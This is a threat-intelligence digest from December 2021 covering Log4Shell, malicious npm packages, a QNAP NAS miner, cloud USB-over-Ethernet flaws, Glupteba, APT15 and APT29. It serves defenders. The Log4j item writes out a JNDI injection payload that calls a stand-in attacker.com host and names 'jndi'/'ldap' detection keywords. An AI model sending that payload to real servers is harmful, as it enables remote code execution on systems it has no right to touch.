<p>The various threat intelligence stories in this iteration of the Anomali Cyber Watch discuss the following topics: <b>Apache, Botnets, China, Espionage, Java, Russia, USB,</b> and <b>Vulnerabilities</b>. The IOCs related to these stories are attached to Anomali Cyber Watch and can be used to check your logs for potential malicious activity.</p> <p><img src="https://cdn.filestackcontent.com/JDkncx6fTMaRukPGjKtB"/><br/> <em>Figure 1 - IOC Summary Charts. These charts summarize the IOCs attached to this magazine and provide a glimpse of the threats discussed.</em></p> <h2>Trending Cyber News and Threat Intelligence</h2> <div class="trending-threat-article"> <h3 id="article-1"><a href="https://www.pcmag.com/news/countless-serves-are-vulnerable-to-apache-log4j-zero-day-exploit" target="_blank">Countless Servers Are Vulnerable to Apache Log4j Zero-Day Exploit</a></h3> <p>(published: December 10, 2021)</p> <p>A critical vulnerability, registered as CVE-2021-44228, has been identified in Apache Log4j 2, which is an open source Java package used to enable logging in. The Apache Software Foundation (ASF) rates the vulnerability as a 10 on the common vulnerability scoring system (CVSS) scale. Cisco Talos has observed malicious activity related to CVE-2021-44228 beginning on December 2, 2021. This vulnerability affects millions of users and exploitation proof-of-concept code exists via LunaSec explains how to exploit it in five simple steps. These include: 1: Data from the User gets sent to the server (via any protocol). 2: The server logs the data in the request, containing the malicious payload: ${jndi:ldap://attacker.com/a} (where attacker.com is an attacker controlled server). 3: The Log4j vulnerability is triggered by this payload and the server makes a request to attacker.com via "Java Naming and Directory Interface" (JNDI). 4: This response contains a path to a remote Java class file (ex. http://second-stage.attacker.com/Exploit.class) which is injected into the server process. 5: This injected payload triggers a second stage, and allows an attacker to execute arbitrary code.<br/> <b>Analyst Comment:</b> Log4j version 2.15.0 has been released to address this vulnerability, however, it only changes a default setting (log4j2.formatMsgNoLookups) from false to true. This means that if the setting is set back to false, Log4j will again be vulnerable to exploitation. The initial campaigns could have been detected by filtering on certain keywords such as "ldap", "jndi", but this detection method is easily bypassable.<br/> <b>MITRE ATT&CK: </b> <a href="https://ui.threatstream.com/ttp/947138">[MITRE ATT&CK] Exploit Public-Facing Application - T1190</a> | <a href="https://ui.threatstream.com/ttp/947244">[MITRE ATT&CK] Exploitation for Client Execution - T1203</a> | <a href="https://ui.threatstream.com/ttp/3906161">[MITRE ATT&CK] Command and Scripting Interpreter - T1059</a> | <a href="https://ui.threatstream.com/ttp/947162">[MITRE ATT&CK] Remote Services - T1021</a> | <a href="https://ui.threatstream.com/ttp/3905348">[MITRE ATT&CK] OS Credential Dumping - T1003</a> | <a href="https://ui.threatstream.com/ttp/2402525">[MITRE ATT&CK] Resource Hijacking - T1496</a> | <a href="https://ui.threatstream.com/ttp/2402530">[MITRE ATT&CK] Network Denial of Service - T1498</a><br/> <b>Tags:</b> Log4j, CVE-2021-44228, Log4j2, Log4Shell, Apache, Zero-day, Java, Jndi, Class file</p> </div> <div class="trending-threat-article"> <h3 id="article-1"><a href="https://thehackernews.com/2021/12/over-dozen-malicious-npm-packages.html" target="_blank">Over a Dozen Malicious NPM Packages Caught Hijacking Discord Servers</a></h3> <p>(published: December 8, 2021)</p> <p>Researchers from the DevOps firm JFrog has found at least 17 malicious packages on the open source npm Registry for JavaScript. The names of the packages are: prerequests-xcode (version 1.0.4), discord-selfbot-v14 (version 12.0.3), discord-lofy (version 11.5.1), discordsystem (version 11.5.1), discord-vilao (version 1.0.0), fix-error (version 1.0.0), wafer-bind (version 1.1.2), waferautocomplete (version 1.25.0), wafer-beacon (version 1.3.3), wafer-caas (version 1.14.20), wafer-toggle (version 1.15.4), wafer-geolocation (version 1.2.10), wafer-image (version 1.2.2), wafer-form (version 1.30.1), wafer-lightbox (version 1.5.4), octavius-public (version 1.836.609), and mrg-message-broker (version 9998.987.376). These packages were found to contain malicious code capable of backdoor or infostealing functionality. Discord servers, which are often abused by threat actors, were used for command and control servers.<br/> <b>Analyst Comment:</b> Open-source code repositories can be valuable in numerous, different workflows, however, the documentation of these usages must be properly documented. This will allow proactive measures to be taken should an incident arise such as this. Your company will have proper internal telemetry in place to track which systems may have downloaded a malicious package, and begin the removal process.<br/> <b>MITRE ATT&CK: </b> <a href="https://ui.threatstream.com/ttp/947235">[MITRE ATT&CK] Obfuscated Files or Information - T1027</a> | <a href="https://ui.threatstream.com/ttp/3904544">[MITRE ATT&CK] Lateral Tool Transfer - T1570</a> | <a href="https://ui.threatstream.com/ttp/2402525">[MITRE ATT&CK] Resource Hijacking - T1496</a><br/> <b>Tags:</b> Malicious packages, npm Registry, Backdoor, Infostealing, Discord</p> </div> <div class="trending-threat-article"> <h3 id="article-1"><a href="https://www.bleepingcomputer.com/news/security/qnap-warns-users-of-bitcoin-miner-targeting-their-nas-devices/" target="_blank">QNAP Warns Users of Bitcoin Miner Targeting Their NAS Devices</a></h3> <p>(published: December 7, 2021)</p> <p>The Taiwan-based company QNAP, has issued a security advisory for its users that threat actors are targeting their network attached storage (NAS) devices with cryptomining malware. The objective of the malware is to mine bitcoin via a process made a NAS device called ‘oom_reaper’ that can use up to 50% of all CPU resources “and will mimic a kernel process with a PID higher than 1000.”<br/> <b>Analyst Comment:</b> QNAP has provided specific measures for its customers located here. Maintain network statistics to find systems that are using more energy than they should be, which may indicate a cryptominer at work. Always change default credentials configurations because threat actors are aware of default settings of devices they target.<br/> <b>Tags:</b> QNAP, NAS, Cryptomining, Bitcoin</p> </div> <div class="trending-threat-article"> <h3 id="article-1"><a href="https://www.sentinelone.com/labs/usb-over-ethernet-multiple-privilege-escalation-vulnerabilities-in-aws-and-other-major-cloud-services/" target="_blank">USB Over Ethernet | Multiple Vulnerabilities in AWS and Other Major Cloud Services</a></h3> <p>(published: December 7, 2021)</p> <p>Patches have been released for numerous vulnerabilities affecting multiple cloud service providers including: Accops, Amazon, Amzetta, Eltima, Mechdyne, and NoMachine. These vulnerabilities originated from a library developed and provided by Eltima, which is in use by several cloud providers, and the list of vulnerable systems is likely to expand after additional research. SentinelLabs’ researchers found that successful exploitation of these vulnerabilities may allow attackers to escalate privileges, disable security solutions, and to pivot to the broader network. These vulnerabilities allow both the server-side and client-side attacks, but no in-the-wild exploitation have been detected yet.<br/> <b>Analyst Comment:</b> The significant volume potential of cloud-services activity is a large target pool from a threat actor’s perspective. It is paramount that default cloud configurations are changed to avoid dictionary-style attacks, networks are segregated, and user account controls are restricted on a need-to-access basis.<br/> <b>MITRE ATT&CK: </b> <a href="https://ui.threatstream.com/ttp/947233">[MITRE ATT&CK] Exploitation for Privilege Escalation - T1068</a> | <a href="https://ui.threatstream.com/ttp/2402543">[MITRE ATT&CK] Virtualization/Sandbox Evasion - T1497</a> | <a href="https://ui.threatstream.com/ttp/947138">[MITRE ATT&CK] Exploit Public-Facing Application - T1190</a><br/> <b>Tags:</b> Cloud Services, Vulnerabilities, CVE-2021-42972, CVE-2021-42973, CVE-2021-42976, CVE-2021-42977, CVE-2021-42979, CVE-2021-42980, CVE-2021-42983, CVE-2021-42986, CVE-2021-42987, CVE-2021-42988, CVE-2021-42990, CVE-2021-42993, CVE-2021-42994, CVE-2021-42996, CVE-2021-43000, CVE-2021-43002, CVE-2021-43003, CVE-2021-43006, CVE-2021-43637, CVE-2021-43638, CVE-2021-42681, CVE-2021-42682, CVE-2021-42683, CVE-2021-42685, CVE-2021-42686, CVE-2021-42687, CVE-2021-42688</p> </div> <div class="trending-threat-article"> <h3 id="article-1"><a href="https://blog.google/threat-analysis-group/disrupting-glupteba-operation/" target="_blank">Disrupting The Glupteba Operation</a></h3> <p>(published: December 7, 2021)</p> <p>Google TAG researchers have released a report explaining actions taken to disrupt the botnet malware, Glupteba. Pay-per-install networks and traffic purchased from traffic distribution systems are the primary-distribution methods. The malware itself is delivered to victim machines via webpages purporting to be downloading cracked software, but actually contained Glupteba. Command and control (C2) communication and binary updates for Glupteba is done via HTTPS, and this infrastructure has a backup mechanism via the Bitcoin blockchain. This is done by storing that encrypted C2 data in OP_RETURN field of unspendable transactions from hardcoded Bitcoin wallet addresses.<br/> <b>Analyst Comment:</b> As long as individuals continue to download cracked software, threat actors will continue using it as a distribution method. These types of downloads should be restricted by your company, often by supplying legitimate with dedicated development teams who continue improving and implementing new patches. Your employees should be well educated about the risks these downloads pose.<br/> <b>MITRE ATT&CK: </b> <a href="https://ui.threatstream.com/ttp/947141">[MITRE ATT&CK] Masquerading - T1036</a> | <a href="https://ui.threatstream.com/ttp/947224">[MITRE ATT&CK] Exfiltration Over Alternative Protocol - T1048</a> | <a href="https://ui.threatstream.com/ttp/947283">[MITRE ATT&CK] Fallback Channels - T1008</a><br/> <b>Tags:</b> Botnet, Glupteba, Cracked software</p> </div> <div class="trending-threat-article"> <h3 id="article-1"><a href="https://www.microsoft.com/security/blog/2021/12/06/nickel-targeting-government-organizations-across-latin-america-and-europe/" target="_blank">NICKEL Targeting Government Organizations Across Latin America and Europe</a></h3> <p>(published: December 6, 2021)</p> <p>The China-based threat actor, Nickel (APT15, Ke3chang, Vixen Panda) has been observed targeting diplomatic entities, governments, and non-governmental organizations since September 2019, according to the Microsoft Threat Intelligence Center. Nickel conducted cyberespionage campaigns targeting 29 countries around the world, with a focus on Latin American and European countries. The group used exploits targeting vulnerable systems with the objective of compromising remote access services and appliances for initial access and reconnaissance. Next, the group was found deploying malware, such as Mimikatz, to gather credentials. Lastly, malware families such as Leeson, Neoichor, NullItch, Numbldea, and Rokum for command and control communication.<br/> <b>Analyst Comment:</b> Information-motivated threat actors will go to great lengths to disguise and hide their activity. Backdoors that are frequently-deployed in cyberespionage campaigns will often remain dormant for some time before conducting malicious activity, and then proceed to steal large amounts of data at a chosen time. Employ cybersecurity frameworks, such as NIST, to have guidelines in place to assist with infrastructure management, patch maintenance, and segregation policies.<br/> <b>MITRE ATT&CK: </b> <a href="https://ui.threatstream.com/ttp/947138">[MITRE ATT&CK] Exploit Public-Facing Application - T1190</a> | <a href="https://ui.threatstream.com/ttp/947217">[MITRE ATT&CK] Exploitation of Remote Services - T1210</a> | <a href="https://ui.threatstream.com/ttp/947216">[MITRE ATT&CK] Exploitation for Credential Access - T1212</a> | <a href="https://ui.threatstream.com/ttp/3905036">[MITRE ATT&CK] Credentials from Password Stores - T1555</a> | <a href="https://ui.threatstream.com/ttp/3905348">[MITRE ATT&CK] OS Credential Dumping - T1003</a> | <a href="https://ui.threatstream.com/ttp/947275">[MITRE ATT&CK] Remote System Discovery - T1018</a> | <a href="https://ui.threatstream.com/ttp/947125">[MITRE ATT&CK] System Information Discovery - T1082</a> | <a href="https://ui.threatstream.com/ttp/947187">[MITRE ATT&CK] System Network Configuration Discovery - T1016</a> | <a href="https://ui.threatstream.com/ttp/947200">[MITRE ATT&CK] System Network Connections Discovery - T1049</a> | <a href="https://ui.threatstream.com/ttp/947120">[MITRE ATT&CK] System Service Discovery - T1007</a><br/> <b>Tags:</b> Nickel, APT15, Ke3chang, Vixen Panda, Cyberespionage</p> </div> <div class="trending-threat-article"> <h3 id="article-1"><a href="https://www.mandiant.com/resources/russian-targeting-gov-business" target="_blank">Suspected Russian Activity Targeting Government and Business Entities Around the Globe</a></h3> <p>(published: December 6, 2021)</p> <p>Mandiant researchers have continued to track the threat actors called, UNC2452 (APT29, Cozy Bear, Nobelium), who were attributed to the SolarWinds breach in April 2021. UNC2452 has been observed to be continuing their targeting of technology providers, and have been using a new downloader called CeeLoader. The group’s primary objective is information theft, which is accomplished via Cobalt Strike Beacon which implants the CeeLoader downloader as a Scheduled Task. Data is gathered via PowerShell commands and dumped into a Mega cloud storage instance; researchers note that the tool designed to dump data to Mega appeared to fail, therefore it is unclear if the data was successfully uploaded there.<br/> <b>Analyst Comment:</b> UNC2452 (APT29, Cozy Bear) is a sophisticated group that continuously updates their TTPs to remain relevant to target environments. The group has been active since at least 2008 and have had notable breaches even before SolarWinds in the United States’ Democratic National Committee, among others. UNC2452 has proven their longevity and persistent threat they represent. It is crucial to educate your employees on threat groups of this nature, and ensure your company has supply chain policies and business continuity plans in place.<br/> <b>MITRE ATT&CK: </b> <a href="https://ui.threatstream.com/ttp/3905074">[MITRE ATT&CK] Phishing - T1566</a> | <a href="https://ui.threatstream.com/ttp/947094">[MITRE ATT&CK] External Remote Services - T1133</a> | <a href="https://ui.threatstream.com/ttp/947231">[MITRE ATT&CK] Valid Accounts - T1078</a> | <a href="https://ui.threatstream.com/ttp/947220">[MITRE ATT&CK] Trusted Relationship - T1199</a> | <a href="https://ui.threatstream.com/ttp/947205">[MITRE ATT&CK] User Execution - T1204</a> | <a href="https://ui.threatstream.com/ttp/3906161">[MITRE ATT&CK] Command and Scripting Interpreter - T1059</a> | <a href="https://ui.threatstream.com/ttp/947127">[MITRE ATT&CK] Scheduled Task - T1053</a> | <a href="https://ui.threatstream.com/ttp/947077">[MITRE ATT&CK] Windows Management Instrumentation - T1047</a> | <a href="https://ui.threatstream.com/ttp/3905768">[MITRE ATT&CK] Boot or Logon Autostart Execution - T1547</a> | <a href="https://ui.threatstream.com/ttp/947127">[MITRE ATT&CK] Scheduled Task - T1053</a> | <a href="https://ui.threatstream.com/ttp/947094">[MITRE ATT&CK] External Remote Services - T1133</a> | <a href="https://ui.threatstream.com/ttp/947231">[MITRE ATT&CK] Valid Accounts - T1078</a> | <a href="https://ui.threatstream.com/ttp/947142">[MITRE ATT&CK] Process Injection - T1055</a> | <a href="https://ui.threatstream.com/ttp/947269">[MITRE ATT&CK] Access Token Manipulation - T1134</a> | <a href="https://ui.threatstream.com/ttp/3905768">[MITRE ATT&CK] Boot or Logon Autostart Execution - T1547</a> | <a href="https://ui.threatstream.com/ttp/947231">[MITRE ATT&CK] Valid Accounts - T1078</a> | <a href="https://ui.threatstream.com/ttp/947127">[MITRE ATT&CK] Scheduled Task - T1053</a> | <a href="https://ui.threatstream.com/ttp/947142">[MITRE ATT&CK] Process Injection - T1055</a> | <a href="https://ui.threatstream.com/ttp/947165">[MITRE ATT&CK] Private Keys - T1145</a> | <a href="https://ui.threatstream.com/ttp/947194">[MITRE ATT&CK] Indicator Removal on Host - T1070</a> | <a href="https://ui.threatstream.com/ttp/3905776">[MITRE ATT&CK] Hide Artifacts - T1564</a> | <a href="https://ui.threatstream.com/ttp/947194">[MITRE ATT&CK] Indicator Removal on Host - T1070</a> | <a href="https://ui.threatstream.com/ttp/947235">[MITRE ATT&CK] Obfuscated Files or Information - T1027</a> | <a href="https://ui.threatstream.com/ttp/2402543">[MITRE ATT&CK] Virtualization/Sandbox Evasion - T1497</a> | <a href="https://ui.threatstream.com/ttp/947166">[MITRE ATT&CK] Modify Registry - T1112</a> | <a href="https://ui.threatstream.com/ttp/947136">[MITRE ATT&CK] Deobfuscate/Decode Files or Information - T1140</a> | <a href="https://ui.threatstream.com/ttp/947231">[MITRE ATT&CK] Valid Accounts - T1078</a> | <a href="https://ui.threatstream.com/ttp/3905348">[MITRE ATT&CK] OS Credential Dumping - T1003</a> | <a href="https://ui.threatstream.com/ttp/947125">[MITRE ATT&CK] System Information Discovery - T1082</a> | <a href="https://ui.threatstream.com/ttp/947195">[MITRE ATT&CK] File and Directory Discovery - T1083</a> | <a href="https://ui.threatstream.com/ttp/947189">[MITRE ATT&CK] Account Discovery - T1087</a> | <a href="https://ui.threatstream.com/ttp/947187">[MITRE ATT&CK] System Network Configuration Discovery - T1016</a> | <a href="https://ui.threatstream.com/ttp/2402543">[MITRE ATT&CK] Virtualization/Sandbox Evasion - T1497</a> | <a href="https://ui.threatstream.com/ttp/947082">[MITRE ATT&CK] System Owner/User Discovery - T1033</a> | <a href="https://ui.threatstream.com/ttp/947200">[MITRE ATT&CK] System Network Connections Discovery - T1049</a> | <a href="https://ui.threatstream.com/ttp/947276">[MITRE ATT&CK] Network Service Scanning - T1046</a> | <a href="https://ui.threatstream.com/ttp/947207">[MITRE ATT&CK] Process Discovery - T1057</a> | <a href="https://ui.threatstream.com/ttp/947120">[MITRE ATT&CK] System Service Discovery - T1007</a> | <a href="https://ui.threatstream.com/ttp/947097">[MITRE ATT&CK] Permission Groups Discovery - T1069</a> | <a href="https://ui.threatstream.com/ttp/3297596">[MITRE ATT&CK] Software Discovery - T1518</a> | <a href="https://ui.threatstream.com/ttp/947252">[MITRE ATT&CK] Query Registry - T1012</a> | <a href="https://ui.threatstream.com/ttp/947162">[MITRE ATT&CK] Remote Services - T1021</a> | <a href="https://ui.threatstream.com/ttp/3905097">[MITRE ATT&CK] Archive Collected Data - T1560</a> | <a href="https://ui.threatstream.com/ttp/947261">[MITRE ATT&CK] Data from Information Repositories - T1213</a> | <a href="https://ui.threatstream.com/ttp/947243">[MITRE ATT&CK] Input Capture - T1056</a> | <a href="https://ui.threatstream.com/ttp/947203">[MITRE ATT&CK] Web Service - T1102</a> | <a href="https://ui.threatstream.com/ttp/3905071">[MITRE ATT&CK] Application Layer Protocol - T1071</a> | <a href="https://ui.threatstream.com/ttp/3904531">[MITRE ATT&CK] Encrypted Channel - T1573</a> | <a href="https://ui.threatstream.com/ttp/947250">[MITRE ATT&CK] Standard Non-Application Layer Protocol - T1095</a> | <a href="https://ui.threatstream.com/ttp/3904502">[MITRE ATT&CK] Non-Standard Port - T1571</a> | <a href="https://ui.threatstream.com/ttp/3904527">[MITRE ATT&CK] Ingress Tool Transfer - T1105</a> | <a href="https://ui.threatstream.com/ttp/947253">[MITRE ATT&CK] Data Transfer Size Limits - T1030</a> | <a href="https://ui.threatstream.com/ttp/2402535">[MITRE ATT&CK] Service Stop - T1489</a> | <a href="https://ui.threatstream.com/ttp/947187">[MITRE ATT&CK] System Network Configuration Discovery - T1016</a><br/> <b>Tags:</b> UNC2452, APT29, Cozy Bear, Nobelium, CeeLoader, Cyberespionage</p> </div>